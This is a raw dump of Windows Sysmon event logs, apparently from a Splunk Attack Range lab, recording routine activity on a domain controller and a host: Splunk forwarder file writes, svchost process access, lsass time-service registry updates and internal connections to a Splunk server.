12:23:01.128{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440195Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:02.654{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A657EC9E3F9FC104A64A5EFD3319B89,SHA256=A4C798895F7761E56F0A8E57380E16033419DCC7C83363934D563A2A5CAADCA4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291370Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:59.557{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50609-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291369Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:02.044{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ADC2049DF22C0B062DDF6117CF7951A,SHA256=1B5F6B5C2FC28B5E762750531496EF04A5A0EF611089906A92B07AA3717DFA82,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440194Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:02.129{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440193Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:02.129{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440199Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:03.869{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06D88BA507E9E1318307146505C0E69C,SHA256=2C3C78836BF87BAF24BFB3BEA7C8F775B1A765824C76EA507112DB3D8ED47C0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291371Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:03.045{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB0839D0332A7056780FA576CC7572F5,SHA256=23E4BED31BB21E876EC52AAABDF810B8095D9C1D291AF401776D62C616CFEBB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440198Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:03.294{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=75D5E117A7A4A29A3BC3FE6FD844DA0B,SHA256=4521A0F65721CB40EF0C0DC6AC2E5179418556F620B27CE443B1624CA0ECB997,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440197Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:03.130{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440196Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:03.130{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440201Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:04.131{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440200Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:04.131{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291372Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:04.078{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68D0CF15721F66698A8E0A2CBC60B6F9,SHA256=974A15C43C77A41B8C389F6480CA6878A9DB09FAEE54524305B0E08D54C92F8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291373Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:05.081{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FCB409B125A7E2EB74816D0C9E576E8,SHA256=BE817B09999E7F0196FC1FA8DD3BF8E3C92EB75DAE46358EEAB9C70910F508E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440205Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:05.253{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9931F5279E68181A805BCDD25A0758E2,SHA256=BB2B2263259B42F6FD2CEFD23DC8FA627A8F84BAC304ABB4ADC784EE910D6172,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440204Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:05.132{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440203Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:05.132{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440202Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:05.049{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=256D4244A880B0D770188F251B6E2533,SHA256=8D70D61B814E311CF09D0A0A634BA9E4CE6C5A9BCC2760C8A0CC5604533ED3A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440208Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:06.133{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440207Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:06.133{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440206Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:06.070{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EDA405C139C4913875561C177A9CC70,SHA256=6BA464CE5DFBA74AB41F79856C060E58D362608A02386A5DCC37A56D9BBBA9E8,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000291384Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:23:06.375{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000291383Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:23:06.375{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x04a92aaf) 13241300x8000000000000000291382Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:23:06.375{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d73b57-0xb174c03e) 13241300x8000000000000000291381Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:23:06.375{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d73b60-0x1339283e) 13241300x8000000000000000291380Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:23:06.375{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d73b68-0x74fd903e) 13241300x8000000000000000291379Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:23:06.375{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000291378Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:23:06.375{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x04a92aaf) 13241300x8000000000000000291377Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:23:06.375{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d73b57-0xb174c03e) 13241300x8000000000000000291376Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:23:06.375{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d73b60-0x1339283e) 13241300x8000000000000000291375Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:23:06.375{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d73b68-0x74fd903e) 23542300x8000000000000000291374Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:06.097{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B28D2BCAFBD57F634FD7710C323AB356,SHA256=6EB437E473D1978D787EFAD527EBAC197A0247CA039B02CB108D3AA5406DB918,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440213Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:07.983{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E98DA184939A5F53C8FD8E7412E335BC,SHA256=0A128FDED7B7A9E532B0DF57A960B1B3F3A9B35551F66FBAEE676D9BC0A73D1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440212Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:07.305{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CAA568361675251D7A514487D115210,SHA256=5A99F95DCB516FBB3FCA91A2F04E6212634DC16309854FC11B7D77FC41116295,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291389Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:05.356{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50610-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291388Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:07.097{BEA10069-D13E-6086-9900-00000000BB01}408NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=1385DDF0A626EB1FF1FAEF0A6E1E1E19,SHA256=D3A04D6A86810FFAE54532D83A4C2D8246C33C9E5E1AB8193B89366C377D56F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291387Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:07.097{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C2D32B46296A9A8B91A5A140CF86BD4,SHA256=637C3C57F58CAF6A6A028F8F138016D368D31EA7154BD39B744244756018665C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440211Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:07.134{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440210Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:07.134{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000440209Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:02.686{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62394-false10.0.1.12-8000- 23542300x8000000000000000291386Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:07.077{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54C76A4AA8C0DA5885F0EAA22E5B2ECB,SHA256=8163DD27A9F911D9760323F0B684405A404E3736613E52C851190EE1665E253F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291385Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:07.076{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77C6E32DBE2EA9500ACE768A87E53376,SHA256=9F007D2FD06492AF7E2C965301C796A839DABFBDC711B63CD2CBE61FA84C4AA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440216Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:08.322{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A397381E8A332BCA27A713A60F75C12,SHA256=C18A4781E5EC4FF37ABC7C761C624F617E41EE3EBCA8344CEDD0A68925921444,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291420Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B6-6086-6501-00000000BB01}4240C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291419Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B6-6086-6501-00000000BB01}4240C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291418Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B6-6086-6501-00000000BB01}4240C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291417Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 